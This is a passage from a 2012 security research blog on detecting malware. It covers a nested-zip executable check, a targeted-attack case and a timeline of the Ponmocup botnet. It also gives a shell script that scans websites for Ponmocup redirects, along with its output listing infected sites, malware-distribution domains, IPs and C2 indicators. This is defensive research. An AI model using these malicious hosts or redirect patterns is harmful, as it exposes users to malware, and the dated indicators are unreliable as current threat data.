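NESTED_ZIP = zip_with({"docs.zip": INVOICE_ZIP})  # executable two levels down
TRUSTED = {"update.example.com"}                  # assumed whitelist

if __name__ == "__main__":
    print(find_executables(NESTED_ZIP))   # [('attachment/docs.zip/invoice.pdf.exe', 'PE')]
    print(mail_decision(NESTED_ZIP), proxy_decision("cdn.example.net", fake_pe(), TRUSTED))
```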
<br />
Detecting a series of targeted attacks:<br />
<br />
Knowing what exploits (CVEs) have been used for targeted attacks, I spotted a single A/V event (containing a "CVE-2011-0611" SWF exploit) from a PDF email attachment amongst hundreds of other mass-malware events. Now knowing the targeted person, I found previous attack mails using CVE-2009-3129 inside an XLS and an unknown exploit inside a PDF with JavaScript. Monitoring the mails of the targeted person, I found an IMG-SRC in an HTML mail without attachments. The URL was using a domain hosted on the same IP that was used for C2 of the previous PDF/SWF exploit and contained the target's email address in it. The attack series continued with a number of DOC attachments with CVE-2012-0158 exploits, some of which were very similar to the ones described on this <a href="http://www.securelist.com/en/blog/208193631/A_Gift_for_Dalai_Lamas_Birthday" target="_blank">Securelist blog</a>.<br />
<br />
The above are of course just some examples of additional prevention and detection measures you can put in place.<br />
<br />
Some other projects, collaboration groups and tools you may want to look at are:<br />
<ul>
<li><a href="http://code.google.com/p/collective-intelligence-framework/" target="_blank">Collective Intelligence Framework</a> (CIF) / <a href="http://holisticinfosec.blogspot.com/2012/07/toolsmith-collective-intelligence.html" target="_blank">Toolsmith </a></li>
<li><a href="http://www.mandiant.com/resources/downloads/" target="_blank">Mandiant's tools</a> from <a href="http://blogs.sans.org/computer-forensics/files/2012/06/SANS-Digital-Forensics-and-Incident-Response-Poster-2012.pdf" target="_blank">DFIR poster</a></li>
<li><a href="http://openioc.org/" target="_blank">OpenIOC</a></li>
<li><a href="http://www.deependresearch.org/2012/08/yara-signature-exchange-google-group.html" target="_blank">YARA exchange group</a></li>
<li><a href="http://malwaremustdie.blogspot.jp/2012/08/the-raise-of-malware-crusaders.html" target="_blank">#MalwareMustDie blog</a> / <a href="https://twitter.com/MalwareMustDie" target="_blank">twitter</a></li>
</ul>
<br />
Feedback is always welcome!<br />
<br />
Cheers,<br />
@c_APT_ure<br />
<br />
<b>Intelligence-driven Security</b> (2012-07-02)<br />
<br />
Is "Intelligence-driven security" the next big thing?<br />
<br />
In my <a href="http://c-apt-ure.blogspot.com/2010/03/first-blog-first-post.html" target="_blank">first blog post</a> I put a link to Deloitte's paper "<a href="http://www.deloitte.com/assets/Dcom-UnitedStates/Local%20Assets/Documents/AERS/us_aers_Deloitte%20Cyber%20Crime%20POV%20Jan252010.pdf" target="_blank">Cyber crime: a clear and present danger -- Combating the fastest growing cyber security threat</a>". Just recently I looked over it again and stopped at page 12: "<i>Developing “actionable” cyber threat intelligence</i>" and "<i>Cyber Threat Intelligence Collection Research, and Analysis Process</i>" -- a great picture. That's an old paper.<br />
<br />
I really like the recent "Getting ahead of Advanced Threats" report from Security for Business Innovation Council (sponsored by RSA).<br />
<br />
Report PDF: <a href="http://www.rsa.com/innovation/docs/CISO-RPT-0112.pdf" target="_blank">Getting Ahead of Advanced Threats</a><br />
<br />
Youtube video: <a href="http://www.youtube.com/watch?v=3mCfO4npfyU" target="_blank">Getting Ahead of Advanced Threats: Achieving Intelligence-driven Security</a><br />
<br />
Blog series about Deconstructing SBIC's "Getting Ahead of Advanced Threats" Report:<br />
<br />
<ol>
<li><a href="http://www.internetidentity.com/news/blog/565-deconstructing-rsas-getting-ahead-of-advanced-threats-reportinformation-vs-intelligence" target="_blank">Information vs Intelligence</a></li>
<li><a href="http://www.internetidentity.com/news/blog/569-deconstructing-rsas-getting-ahead-of-advanced-threats-reportthe-importance-of-the-extended-enterprise" target="_blank">The Importance of the Extended Enterprise</a></li>
<li><a href="http://www.internetidentity.com/news/blog/573-deconstructing-sbics-getting-ahead-of-advanced-threats-reportintelligence-driven-information-security" target="_blank">Intelligence-Driven Information Security</a></li>
<li><a href="http://www.internetidentity.com/news/blog/574-deconstructing-sbics-getting-ahead-of-advanced-threats-reportbuilding-sources" target="_blank">Building Sources</a></li>
<li><a href="http://www.internetidentity.com/news/blog/582-deconstructing-sbics-getting-ahead-of-advanced-threats-reporttaking-action" target="_blank">Taking Action</a></li>
<li><a href="http://internetidentity.com/news/blog/594-deconstructing-sbics-getting-ahead-of-advanced-threats-reporta-day-in-the-life-fighting-cybercrime" target="_blank">A Day In The Life Fighting Cybercrime</a></li>
</ol>
As I have mentioned in a previous post, something to really look out for is the <a href="http://code.google.com/p/collective-intelligence-framework/" target="_blank">Collective Intelligence Framework</a> (CIF). Take a look at the <a href="http://code.google.com/p/collective-intelligence-framework/wiki/CommunityExamples" target="_blank">Community examples</a> and maybe even the <a href="http://code.google.com/p/collective-intelligence-framework/wiki/ProjectAvenger" target="_blank">Avenger Project</a>.<br />
<br />
I heard a <a href="https://twitter.com/holisticinfosec/status/217500189219491840" target="_blank">rumor</a> that CIF will be covered this month in <a href="http://holisticinfosec.org/toolsmith.htm" target="_blank">Russ McRee's toolsmith</a>, which is always a great resource, too.<br />
<br />
If you know other good resources alike please let me know.<br />
<br />
Thanks for reading...<br />
<br />
@c_APT_ure<br />
<br />
<b>History of Ponmocup Malware / Botnet</b> (2012-06-27)<br />
<br />
This is a history of some events and publications about the Ponmocup malware or botnet.<br />
(work in progress -- will get updated eventually)<br />
<br />
There are many aliases from different A/V vendors as previously mentioned on my blog<br />
(<a href="http://www.threatexpert.com/threats/trojandownloader-win32-ponmocup-a.html" target="_blank">Ponmocup</a>, <a href="http://www.threatexpert.com/report.aspx?md5=e60597691f8911c77078e58d63934be4" target="_blank">Pirminay</a>, Kryptik, <a href="http://www.threatexpert.com/threats/trojanspy-win32-swisyn-b.html" target="_blank">Swisyn</a>, <a href="http://www.threatexpert.com/threats/adware-vundo-v-gen.html" target="_blank">Vundo</a>, <a href="http://www.threatexpert.com/threats/trojan-win32-monder.html" target="_blank">Monder</a>, <a href="http://www.threatexpert.com/threats/trojan-virtumonde.html" target="_blank">Virtumonde</a>/<a href="http://www.threatexpert.com/threats/adware-virtumondo.html" target="_blank">Virtumondo</a> etc.).<br />
The name used most often lately is "<a href="http://www.symantec.com/security_response/writeup.jsp?docid=2010-071503-4247-99&tabid=2" target="_blank">Trojan Milicenso</a>" by Symantec, which has a <span style="background-color: yellow;">good blog post and detection description</span> about it.<br />
And it's been around at least since 2009, not just 2010 as mentioned in several places.<br />
<br />
<div style="color: #990000;">
Update 2012-08-13: there have been some more related posts published since my original post</div>
<div style="color: #990000;">
<br /></div>
<div style="color: #990000;">
2012-07-04: <span style="background-color: yellow;">Symantec blog</span> "<a href="http://www.symantec.com/connect/blogs/trojanmilicenso-infection-through-htaccess-redirection" target="_blank">Trojan.Milicenso: Infection through .htaccess Redirection</a>"</div>
<div style="color: #990000;">
2012-07-02: <span style="background-color: yellow;">Symantec blog</span> "<a href="http://www.symantec.com/connect/blogs/printer-madness-w32printlove-video" target="_blank">Printer Madness: W32.Printlove Video</a>"</div>
<br />
2012-06-25: ComputerWorld article "<a href="http://www.computerworld.com/s/article/9228464/Malware_infection_forces_printers_to_print_garbled_data_researchers_say" target="_blank">Malware infection forces printers to print garbled data</a>"<br />
2012-06-25: ITWorld "<a href="http://www.itworld.com/security/282265/printer-malware-wingdings-gone-wild" target="_blank">Printer malware – Wingdings gone wild</a>"<br />
<br />
2012-06-23: The Hacker News "<a href="http://thehackernews.com/2012/06/trojanmilicenso-print-bomb-printer.html" target="_blank">Trojan.Milicenso - Printer Trojan cause massive printing</a>"<br />
<br />
2012-06-22: ZDNet "<a href="http://www.zdnet.com/blog/security/thousands-of-office-printers-hit-by-gibberish-malware/12550" target="_blank">Thousands of office printers hit by 'gibberish' malware</a>"<br />
2012-06-22: Bloomberg Tech Blog "<a href="http://go.bloomberg.com/tech-blog/2012-06-22-when-hackers-fumble-printer-bomb-noisily-announces-attack/" target="_blank">When Hackers Fumble: ‘Printer Bomb’ Noisily Announces Attack</a>"<br />
2012-06-22: NET-Security "<a href="http://www.net-security.org/malware_news.php?id=2156" target="_blank">Trojan infection triggers massive printing jobs</a>" <br />
<br />
2012-06-21: ARStechnica "<a href="http://arstechnica.com/security/2012/06/printer-bomb-pandimonium/" target="_blank">Printer bomb malware wastes reams of paper, sparks pandemonium</a>"<br />
2012-06-21: SANS ISC diary "<a href="http://isc.sans.edu/diary.html?storyid=13519" target="_blank">Print Bomb? (Take 2)</a>"<br />
2012-06-21: <span style="background-color: yellow;">Symantec blog</span> "<a href="http://www.symantec.com/connect/blogs/trojanmilicenso-paper-salesman-s-dream-come-true" target="_blank">Trojan.Milicenso: A Paper Salesman’s Dream Come True</a>"<br />
<br />
2012-06-14: <span style="background-color: white;">Symantec KB article</span> "<a href="http://www.symantec.com/docs/TECH190982" target="_blank">Malware is causing network printers to print random ASCII characters</a>"<br />
<br />
2012-06-13: Mcafee Threat Advisory "<a href="https://kc.mcafee.com/resources/sites/MCAFEE/content/live/PRODUCT_DOCUMENTATION/23000/PD23822/en_US/McAfee_Labs_Threat_Advisory_Vundo.pdf" target="_blank">Vundo</a>"<br />
<br />
2012-06-08: SANS ISC diary "<a href="https://isc.sans.edu/diary.html?storyid=13405" target="_blank">Print Bomb?</a>" (see also comments)<br />
2012-06-08: Symantec forum thread "<a href="http://www.symantec.com/connect/forums/print-server-gone-wild" target="_blank">Print server gone wild</a>"<br />
<br />
2012-06-07: McAfee community forum thread "<a href="https://community.mcafee.com/thread/45989?start=0&tstart=0" target="_blank">Printer Virus?</a>"<br />
<br />
2012-06-03: <b>c-APT-ure blog post</b> "<a href="http://c-apt-ure.blogspot.com/2012/06/introducing-ponmocup-finder.html" target="_blank">Introducing Ponmocup-Finder</a>"<br />
<br />
2012-05-16: Sophos detection "<a href="http://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj%7EPonmocup-F/detailed-analysis.aspx" target="_blank">Troj/Ponmocup-F</a>"<br />
<br />
2012-04-27: <b>c-APT-ure blog post</b> "<a href="http://c-apt-ure.blogspot.com/2012/04/hunting-ponmocup-botnet.html" target="_blank">Hunting Ponmocup Botnet</a>"<br />
<br />
2012-04-13: <b>Collection of my tweets on Storify</b> "<a href="http://storify.com/c_APT_ure/a-v-failed-for-ponmocup-malware" target="_blank">A/V failed for Ponmocup malware!?</a>"<br />
<br />
2012-04-08: <b>IOC on ForensicArtifacts.com</b> "<a href="http://ioc.forensicartifacts.com/2012/04/ponmocup-2/" target="_blank">Ponmocup IOC released</a>"<br />
<br />
2012-03-08: <b>c-APT-ure blog post</b> "<a href="http://c-apt-ure.blogspot.com/2012/03/ponmocup-lots-changed-but-not-all.html" target="_blank">Ponmocup, lots changed, but not all</a>"<br />
<br />
2012-02-20: <b>Ponmocup analysis page created</b> "<a href="http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/ponmocup-analysis_2012-02-18.html" target="_blank">Why so many diff A/V detections?</a>"<br />
<br />
2012-02-18: <b>c-APT-ure blog post</b> "<a href="http://c-apt-ure.blogspot.com/2012/02/not-apt-but-nasty-malware-ponmocup.html" target="_blank">Not APT, but nasty malware (Ponmocup botnet)</a>"<br />
<br />
2011-11-15: <b>Mandiant forum thread started</b> "<a href="https://forums.mandiant.com/topic/ioc-request-for-ponmocup-malware-botnet" target="_blank">IOC request for Ponmocup malware (botnet)</a>"<br />
<br />
2011-05-30: <b>created web page</b> "<a href="http://www9.dyndns-server.com:8080/pub/botnet-links.html" target="_blank">Collection of links related to the Ponmocup botnet</a>"<br />
<br />
2011-05-23: Abuse.ch blog "<a href="http://www.abuse.ch/?p=3294" target="_blank">How Big is Big? Some Botnet Statistics</a>"<br />
<br />
2011-04-22: TrendMicro detection "<a href="http://about-threats.trendmicro.com/Malware.aspx?language=us&name=TSPY_PIRMINAY.A" target="_blank">TSPY_PIRMINAY.A</a>"<br />
<br />
2011-04-21: Malware Survival "<a href="http://malwaresurvival.net/2011/04/21/media-site-pimping-malware/" target="_blank">Media Site Pimping Malware</a>"<br />
<br />
2011-04-20: Sophos detection "<a href="http://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Mal%7EPonmocup-A/detailed-analysis.aspx" target="_blank">Mal/Ponmocup-A</a>" (detailed analysis of 3 samples)<br />
<br />
2010-12-06: SPAMfighter news: "<a href="http://www.spamfighter.com/News-15476-New-Trojan-Blocks-Access-To-Bittorrent-Websites-Webroot.htm" target="_blank">New Trojan Blocks Access To Bittorrent Websites: Webroot</a>"<br />
<br />
2010-11-25: Softpedia news "<a href="http://news.softpedia.com/news/The-Pirate-Bay-and-Mininova-Blocked-by-Mysterious-New-Trojan-168578.shtml" target="_blank">The Pirate Bay and Mininova Blocked by Mysterious New Trojan</a>"<br />
<br />
2010-11-24: Webroot blog "<a href="http://blog.webroot.com/2010/11/24/troublesome-trojan-trammels-torrent-sites/" target="_blank">Troublesome Trojan Trammels Torrent Sites</a>"<br />
<br />
2010-07-14: <span style="background-color: yellow;">Symantec detection created</span> "<a href="http://www.symantec.com/security_response/writeup.jsp?docid=2010-071503-4247-99&tabid=2" target="_blank">Trojan.Milicenso</a>"<br />
<br />
2010-06-04: Microsoft MPC Encyclopedia entry "<a href="http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=TrojanDownloader%3AWin32%2FPonmocup.A&ThreatID=146443" target="_blank">TrojanDownloader:Win32/Ponmocup.A</a>"<br />
<br />
2010-03-19: Sophos detection "<a href="http://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj%7EMdrop-CLC/detailed-analysis.aspx" target="_blank">Troj/Mdrop-CLC</a>"<br />
<br />
2009-12-30: Microsoft MPC Detection initially created "<a href="http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=TrojanDropper%3AWin32%2FPonmocup.A" target="_blank">TrojanDropper:Win32/Ponmocup.A</a>"<br />
<br />
2009-11-22: Microsoft MPC Detection initially created "<a href="http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=TrojanDownloader%3AWin32%2FPonmocup.A&ThreatID=146443" target="_blank">TrojanDownloader:Win32/Ponmocup.A</a>"<br />
<br />
Please report any broken (or obviously wrong) links, thanks.<br />
<br />
Feedback and questions are welcome!<br />
<br />
@c_APT_ure<br />
<br />
TomU http://www.blogger.com/profile/16795133222461988201 noreply@blogger.com 0 tag:blogger.com,1999:blog-4767199732858434539.post-4563456533987504433 2012-06-03T08:44:00.000-07:00 2013-06-01T07:11:09.766-07:00
Introducing Ponmocup-Finder
<div style="color: red;">
<span style="font-size: small;"><b><span style="font-family: Arial,Helvetica,sans-serif;">Update 2013-06-01:</span> </b></span><br />
Please also read my newer blog posts about Ponmocup:<br />
<ul>
<li><a href="http://c-apt-ure.blogspot.com/2013/05/ponmocup-hunter-sans-dfir-summit-2013.html" target="_blank">"Ponmocup Hunter" SANS DFIR Summit 2013</a></li>
<li><a href="http://c-apt-ure.blogspot.com/2012/06/history-of-ponmocup-malwarebotnet.html" target="_blank">History of Ponmocup Malware / Botnet</a></li>
</ul>
Ponmocup-Finder has evolved into a little "workflow" :-)<br />
<ol>
<li><a href="http://security-research.dyndns.org/pub/botnet/ponmocup/ponmocup-finder/ponmocup-suspicious-domains-latest.txt" target="_blank">add new infected domains to the list</a></li>
<li><a href="http://security-research.dyndns.org/pub/botnet/ponmocup/ponmocup-finder/run-ponmocup-finder-sh.txt" target="_blank">daily cronjob to run Ponmocup-Finder</a></li>
<li><a href="http://security-research.dyndns.org/pub/botnet/ponmocup/ponmocup-finder/ponmocup-finder-sh.txt" target="_blank">latest Ponmocup-Finder script</a></li>
<li><a href="http://security-research.dyndns.org/pub/botnet/ponmocup/ponmocup-finder/ponmocup-infected-domains-latest.txt" target="_blank">list of currently infected webservers</a></li>
<li><a href="http://security-research.dyndns.org/pub/botnet/ponmocup/ponmocup-finder/ponmocup-infected-domains-history-uniq-infected-days.txt" target="_blank">history of all previously infected webservers</a></li>
<li>notification lists for <a href="http://security-research.dyndns.org/pub/botnet/ponmocup/ponmocup-finder/ponmocup-infected-domains-latest_CH-LI.txt" target="_blank">CH / LI</a> and <a href="http://security-research.dyndns.org/pub/botnet/ponmocup/ponmocup-finder/ponmocup-infected-domains-latest_DE.txt" target="_blank">DE</a> domains </li>
</ol>
If you can do notifications for any infected webservers, go ahead and feel free to let me know.<br />
<br />
It would be great to see search engines (Google, MS Bing etc.) add checks for these infections to their spiders (they would only need to change the user-agent for one request per site), since <a href="http://www.symantec.com/connect/blogs/trojanmilicenso-infection-through-htaccess-redirection" target="_blank">infections happen only through search engine redirects</a>.<br />
<br />
<b>Update 2012-10-18:</b><br />
Finally I updated the <a href="http://security-research.dyndns.org/pub/botnet/ponmocup/ponmocup-finder/ponmocup-finder_v2.txt" target="_blank">ponmocup-finder script</a> as promised. I also managed to download a new infector and <a href="http://security-research.dyndns.org/pub/botnet/ponmocup/analysis_2012-10-05/analysis.txt" target="_blank">analyze the malware</a> in a VM. You can also just look at some <a href="http://security-research.dyndns.org/pub/botnet/ponmocup/analysis_2012-10-05/screenshots/" target="_blank">screenshots</a> of the analysis.<b></b><br />
And lastly here are some network indicators of C2:<br />
<br />
<pre><span style="color: black;"> intohave.com / 64.179.44.188 (DNS request only)
88.216.164.117</span></pre>
<br />
For more malicious domains and IPs you can download my malware feeds (also using <a href="http://code.google.com/p/collective-intelligence-framework/wiki/WhatisCIF" target="_blank">CIF</a>) here:<br />
<br />
<span style="font-family: "Courier New",Courier,monospace; font-size: small;"><span style="color: black;"><a href="http://security-research.dyndns.org/pub/malware-feeds/ponmocup-botnet-domains.txt">http://security-research.dyndns.org/pub/malware-feeds/ponmocup-botnet-domains.txt</a><br /><a href="http://security-research.dyndns.org/pub/malware-feeds/ponmocup-botnet-ips.txt">http://security-research.dyndns.org/pub/malware-feeds/ponmocup-botnet-ips.txt</a><br /><a href="http://security-research.dyndns.org/pub/malware-feeds/ponmocup-malware-domains.txt">http://security-research.dyndns.org/pub/malware-feeds/ponmocup-malware-domains.txt</a><br /><a href="http://security-research.dyndns.org/pub/malware-feeds/ponmocup-malware-ips.txt">http://security-research.dyndns.org/pub/malware-feeds/ponmocup-malware-ips.txt</a></span></span><b><br /></b><br />
<br />
<b>Update 2012-09-25:</b></div>
<span style="color: red;">The Ponmocup finder script needs some update / tweeking, since the redirection URL patterns changed massively again (</span><a href="http://security-research.dyndns.org/pub/malware-feeds/ponmocup-urls.txt" style="color: blue;" target="_blank">samples</a><span style="color: red;">). Instead of just checking for the two previously known URL patterns (</span><span style="color: blue; font-family: "Courier New",Courier,monospace;">"/url\?sa=|/cgi-bin/r.cgi\?p="</span><span style="color: red;">) it should check if the infected website domain appears in the URI parameters of the redirection URL. I will update the script on this post as soon as I find time.</span><br />
<br />
You may have recently read a lot of hype about Flame or SkyWiper "cyber weapon", the son (or big brother) of Stuxnet and Duqu, which was found on a few thousand systems in a limited number of countries for espionage. Interesting and somewhat impressive, but this post is not about any of this stuff.<br />
<br />
The Ponmocup malware and botnet is something totally different. A year ago the botnet was several million bots big (at least 4 million IPs, perhaps a multiple of that in bots) [1]. And it does not target or discriminate against any specific country, so the chances are a lot better that you will find one of these bots in your network than a Flame infection.<br />
Please read my previous three posts about Ponmocup to get an idea of what it is and how it works.<br />
<br />
<br />
[1] <a href="http://c-apt-ure.blogspot.ch/2012/02/not-apt-but-nasty-malware-ponmocup.html" target="_blank">Not APT, but nasty malware (Ponmocup botnet)</a><br />
[2] <a href="http://c-apt-ure.blogspot.ch/2012/03/ponmocup-lots-changed-but-not-all.html" target="_blank">Ponmocup, lots changed, but not all</a><br />
[3] <a href="http://c-apt-ure.blogspot.com/2012/04/hunting-ponmocup-botnet.html" target="_blank">Hunting Ponmocup Botnet</a><br />
<br />
Just to clarify something first: this post is more about detecting hacked or infected web servers that redirect unsuspecting visitors to malware downloads than about detecting the infected bots themselves. For the latter, see my request to researchers to find current C&C domains in [3].<br />
<br />
I don't know of any service, including all 32 listed on <a href="http://urlvoid.com/">urlvoid.com</a>, that detects these infected web servers.<br />
<br />
So I threw together this little shell script that takes a list of domains and, with a single request per domain, checks whether it is infected and redirecting visitors to Ponmocup malware (see [2]).<br />
<br />
This script is aimed at registrars, ISPs, web hosters, GovCERTs, malware researchers, botnet hunters, or generally anyone who wants to find (and hopefully report) infected web servers and who has access to a large number of domains.<br />
<br />
<div style="font-family: "Courier New",Courier,monospace;">
$ cat ponmocup-finder.sh<br />
#!/bin/bash<br />
echo "date started: `date`"<br />
cat $1 | \<br />
while read domain; do<br />
echo -ne "checking domain: $domain --> ";<br />
wget -Sv --tries=1 --connect-timeout=5 \</div>
<div style="font-family: "Courier New",Courier,monospace;">
--user-agent="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13" \</div>
<div style="font-family: "Courier New",Courier,monospace;">
--referer="http://www.google.ch/search?q=ponmocup+check" \</div>
<div style="font-family: "Courier New",Courier,monospace;">
http://${domain}/ -O ${domain}.out > ${domain}_wget.log 2>&1<br />
redir=`egrep -m 1 "Location: " ${domain}_wget.log`<br />
<span style="color: red;">## match=`echo $redir | egrep "(/url\?sa=|/cgi-bin/r.cgi\?p=)" | wc -l`</span><br />
<span style="color: red;"> match=`echo $redir | cut -d"?" -f2- | egrep "$domain" | wc -l` </span><br />
if [ $match -gt 0 ]<br />
then<br />
echo -ne "seems to be INFECTED: "<br />
echo -ne `echo $redir | cut -d" " -f2 | cut -d"?" -f1`<br />
egrep -m 2 "Resolving " ${domain}_wget.log | tail -1 | sed -e 's/Resolving/ --> DNS:/g'<br />
else<br />
echo "seems to be CLEAN"<br />
fi<br />
done<br />
echo "date finished: `date`"</div>
<br />
<br />
Now let's run this script with a list of 88 domains (known to have been previously infected).<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">$ ./ponmocup-finder.sh domains-1.txt | tee ponmocup-finder_domains-1.log</span><br />
<span style="font-family: "Courier New",Courier,monospace;">checking domain: aviationhumor.net --> seems to be INFECTED: http://philosophymercer.com/cgi-bin/r.cgi --> DNS: philosophymercer.com... 62.212.74.228<br />checking domain: bgs-architekten.com --> seems to be INFECTED: http://capitalinformer.com/cgi-bin/r.cgi --> DNS: capitalinformer.com... 82.98.86.165</span><br />
<span style="font-family: "Courier New",Courier,monospace;">... </span><br />
<span style="font-family: "Courier New",Courier,monospace;">checking domain: www.w-en-ve.nl --> seems to be INFECTED: http://reportedtechniques.org/cgi-bin/r.cgi --> DNS: reportedtechniques.org... 208.91.197.108 </span><br />
<br />
How long did it take to check these 88 domains? About 160 seconds<br />
<br />
<div style="font-family: "Courier New",Courier,monospace;">
$ egrep "date " ponmocup-finder_domains-1.log<br />
date started: Sat Jun 2 18:33:08 CEST 2012<br />
date finished: Sat Jun 2 18:35:48 CEST 2012</div>
<br />
<br />
Let's separate the clean and infected domains and do some stats:<br />
<br />
<div style="font-family: "Courier New",Courier,monospace;">
$ egrep CLEAN ponmocup-finder_domains-1.log > ponmocup-finder_domains-1_CLEAN.log<br />
$ egrep INFECTED ponmocup-finder_domains-1.log > ponmocup-finder_domains-1_INFECTED.log</div>
<div style="font-family: "Courier New",Courier,monospace;">
$ wc -l ponmocup-finder_domains-1_*.log<br />
36 ponmocup-finder_domains-1_CLEAN.log<br />
<span style="background-color: yellow;">52 ponmocup-finder_domains-1_INFECTED.log</span><br />
88 total</div>
<br />
Let's look at the malware domains and IPs: (these are <b>not</b> C&C domains of infected clients)<br />
<br />
<span style="color: red;"><b>Important note:</b> some of the older, inactive domains appear to have been grabbed by some domain parking services. Thus not all domains and IPs below are used for malware distribution. I need to separate the good from the <span style="background-color: yellow;">bad and ugly</span> (later).</span><br />
<br />
<div style="font-family: "Courier New",Courier,monospace;">
$ cat ponmocup-finder_domains-1_INFECTED.log | cut -d":" -f5- | awk '{ print $2" "$1 }' | sort | uniq -c<br />
<div style="background-color: yellow;">
1 176.53.112.108 ceprez.recycling-computers-portland.com...</div>
<div style="background-color: yellow;">
1 178.211.33.202 49847.hotel-sarajevo.com...</div>
<div style="background-color: yellow;">
1 178.211.33.202 lerberg.belanyi.com...</div>
<div style="background-color: yellow;">
1 178.211.33.203 38831.learn2drive4free.com...</div>
<div style="background-color: yellow;">
1 178.211.33.203 45215.thomasyohannan.com...</div>
<div style="background-color: yellow;">
1 178.211.33.203 46722.azangelfish.com...</div>
<div style="background-color: yellow;">
1 178.211.33.205 vamped.wonderfulroofing.com...</div>
3 199.59.241.218 herocopter.com...<br />
3 199.59.241.218 indanetwall.net...<br />
1 199.59.241.218 infernomag.com...<br />
2 208.91.197.108 reportedtechniques.org...<br />
2 217.11.251.173 underbuild.net...<br />
6 62.212.74.224 lewisentitled.com...<br />
2 62.212.74.228 philosophymercer.com...<br />
1 69.43.161.177 trialworld.net...<br />
<div style="background-color: yellow;">
1 77.79.11.96 45531.3d-tablet.cc...</div>
<div style="background-color: yellow;">
1 77.79.11.96 45585.3d-tablet.cc...</div>
2 82.98.86.165 capitalinformer.com...<br />
1 8.5.1.34 jesusonlynet.org...<br />
<div style="background-color: yellow;">
1 91.207.4.51 41950.thepetserver.com...</div>
<div style="background-color: yellow;">
1 91.207.4.51 52984.pballgames.com...</div>
1 94.63.149.247 handsexual.com...<br />
<span style="color: red;"> 1 failed: 35803.finishline-fitness.co.uk...</span><br />
<span style="color: red;"> 1 failed: 43560.vicandbarbs.net...</span><br />
<span style="color: red;"> 1 failed: apartliberal.com...</span><br />
<span style="color: red;"> 4 failed: besidesdream.com...</span><br />
<span style="color: red;"> 2 failed: costslaid.com...</span><br />
<span style="color: red;"> 3 failed: dutytraditional.net...</span><br />
<span style="color: red;"> 1 failed: earlyanswered.com...</span><br />
<span style="color: red;"> 1 failed: interestingchapter.net...</span><br />
<span style="color: red;"> 1 failed: thousandmilitary.com...</span><br />
<span style="color: red;"> 1 failed: twiceseparate.com...</span><br />
<span style="color: red;"> 1 failed: watchingsquare.com...</span></div>
<br />
And here are just the IPs: <br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">$ cat ponmocup-finder_domains-1_INFECTED.log | cut -d":" -f5- | awk '{ print $2 }' | sort | uniq -c</span><br />
<span style="font-family: "Courier New",Courier,monospace;"> <span style="background-color: yellow;">1 176.53.112.108</span></span><br />
<span style="font-family: "Courier New",Courier,monospace;"> <span style="background-color: yellow;">2 178.211.33.202</span></span><br />
<span style="font-family: "Courier New",Courier,monospace;"> <span style="background-color: yellow;">3 178.211.33.203</span></span><br />
<span style="font-family: "Courier New",Courier,monospace;"> <span style="background-color: yellow;">1 178.211.33.205</span></span><br />
<span style="font-family: "Courier New",Courier,monospace;"> 7 199.59.241.218</span><br />
<span style="font-family: "Courier New",Courier,monospace;"> 2 208.91.197.108</span><br />
<span style="font-family: "Courier New",Courier,monospace;"> 2 217.11.251.173</span><br />
<span style="font-family: "Courier New",Courier,monospace;"> 6 62.212.74.224</span><br />
<span style="font-family: "Courier New",Courier,monospace;"> 2 62.212.74.228</span><br />
<span style="font-family: "Courier New",Courier,monospace;"> 1 69.43.161.177</span><br />
<span style="font-family: "Courier New",Courier,monospace;"> <span style="background-color: yellow;">2 77.79.11.96</span></span><br />
<span style="font-family: "Courier New",Courier,monospace;"> 2 82.98.86.165</span><br />
<span style="font-family: "Courier New",Courier,monospace;"> 1 8.5.1.34</span><br />
<span style="font-family: "Courier New",Courier,monospace;"> <span style="background-color: yellow;">2 91.207.4.51</span></span><br />
<span style="font-family: "Courier New",Courier,monospace;"> 1 94.63.149.247</span><br />
<span style="color: red; font-family: "Courier New",Courier,monospace;"> 17 failed:</span><br />
<br />
And here's a list of all malware domains and IPs discovered: (numeric only subdomains replaced with "*")<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">$ cat ponmocup-finder_domains-1_INFECTED.log | cut -d":" -f5- | awk '{ print $2"\n"$1 }' | sed -e 's/[0-9][0-9][0-9][0-9][0-9]/\*/g' | sed -e 's/\.\.\.//g' | sort | uniq | egrep -v failed</span><br />
<span style="font-family: "Courier New",Courier,monospace;">176.53.112.108</span><br />
<span style="font-family: "Courier New",Courier,monospace;">178.211.33.202</span><br />
<span style="font-family: "Courier New",Courier,monospace;">178.211.33.203</span><br />
<span style="font-family: "Courier New",Courier,monospace;">178.211.33.205</span><br />
<span style="font-family: "Courier New",Courier,monospace;">199.59.241.218</span><br />
<span style="font-family: "Courier New",Courier,monospace;">208.91.197.108</span><br />
<span style="font-family: "Courier New",Courier,monospace;">217.11.251.173</span><br />
<span style="font-family: "Courier New",Courier,monospace;">62.212.74.224</span><br />
<span style="font-family: "Courier New",Courier,monospace;">62.212.74.228</span><br />
<span style="font-family: "Courier New",Courier,monospace;">69.43.161.177</span><br />
<span style="font-family: "Courier New",Courier,monospace;">77.79.11.96</span><br />
<span style="font-family: "Courier New",Courier,monospace;">82.98.86.165</span><br />
<span style="font-family: "Courier New",Courier,monospace;">8.5.1.34</span><br />
<span style="font-family: "Courier New",Courier,monospace;">91.207.4.51</span><br />
<span style="font-family: "Courier New",Courier,monospace;">94.63.149.247</span><br />
<span style="font-family: "Courier New",Courier,monospace;">*.3d-tablet.cc</span><br />
<div style="font-family: "Courier New",Courier,monospace;">
apartliberal.com<br />
*.azangelfish.com<br />
besidesdream.com<br />
capitalinformer.com<br />
ceprez.recycling-computers-portland.com<br />
costslaid.com<br />
dutytraditional.net<br />
earlyanswered.com<br />
*.finishline-fitness.co.uk<br />
handsexual.com<br />
herocopter.com<br />
*.hotel-sarajevo.com<br />
indanetwall.net<br />
infernomag.com<br />
interestingchapter.net<br />
jesusonlynet.org<br />
*.learn2drive4free.com<br />
lerberg.belanyi.com<br />
lewisentitled.com<br />
*.pballgames.com<br />
philosophymercer.com<br />
